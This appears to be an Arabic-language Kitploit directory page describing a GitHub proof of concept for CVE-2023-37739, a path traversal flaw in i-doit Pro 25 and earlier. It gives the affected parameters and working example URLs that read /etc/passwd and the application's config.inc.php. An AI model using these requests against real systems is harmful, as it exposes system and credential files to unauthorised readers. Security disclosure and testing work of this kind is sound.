Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below — إثبات مفهوم لاستغلال CVE-2023-37739، وهي ثغرة اجتياز المسار في i-doit Pro 25 وما دونها، مما تتيح للمستخدمين المصادق عليهم قراءة الملفات الحساسة عبر معاملات moduleID و file مصممة بعناية. | Kitploit
أدوات/GitHubGitHub/leekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubleekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below

CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below

إثبات مفهوم لاستغلال CVE-2023-37739، وهي ثغرة اجتياز المسار في i-doit Pro 25 وما دونها، مما تتيح للمستخدمين المصادق عليهم قراءة الملفات الحساسة عبر معاملات moduleID و file مصممة بعناية.

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-37739 - اجتياز المسار في i-doit Pro 25 والإصدارات الأقدم

i-doit Pro 25 والإصدارات الأقدم معرضة لثغرة اجتياز المسار (Path Traversal). تسمح هذه الثغرات للمهاجمين المصادق عليهم عن بُعد (بصلاحيات منخفضة أو عالية) بالتنقل إلى مواقع لا ينبغي أن تكون متاحة للمستخدم. يمكن استخدامها لقراءة و/أو الوصول إلى ملفات حساسة.

وصف المنتج: i-doit هو توثيق تقني قائم على الويب وقاعدة بيانات إدارة التكوين (CMDB) تم تطويره بواسطة synetics GmbH، i-doit Pro هو الإصدار التجاري من البرنامج ويتطلب ترخيصًا مدفوعًا. يأتي بميزات إضافية ودعم احترافي وتحديثات وتحسينات منتظمة. يحتاج المستخدمون إلى شراء ترخيص لاستخدام i-doit Pro، وتختلف التكلفة بناءً على عدد المستخدمين والميزات المطلوبة.

وصف الثغرة: وجدنا أن هذا التطبيق الويب يسمح لأي مستخدم مصادق عليه بالتنقل إلى مواقع لا ينبغي أن تكون متاحة للمستخدم. يمكن استخدامها لقراءة و/أو الوصول إلى ملفات حساسة...

الصفحات المتأثرة: /?moduleID و /index.php

المعامل والمكوّن المتأثر 1: ?moduleID=2&file_manager=image&file

المعامل والمكوّن المتأثر 2: ?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=

الخطوة 1: سجّل الدخول كأي مستخدم صالح، يمكن أن يكون بصلاحية منخفضة أو عالية. انتقل إلى الرابط أدناه، وعدّل ../../../ إلى الملف الذي ترغب في قراءته أو الوصول إليه.

step1

مثال 1: http://IP/?moduleID=2&file_manager=image&file=../../../../../../..//etc/passwd

مثال 2: http://IP/index.php?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=../../../src/config.inc.php

step2

step3

step4

تنزيل الأداة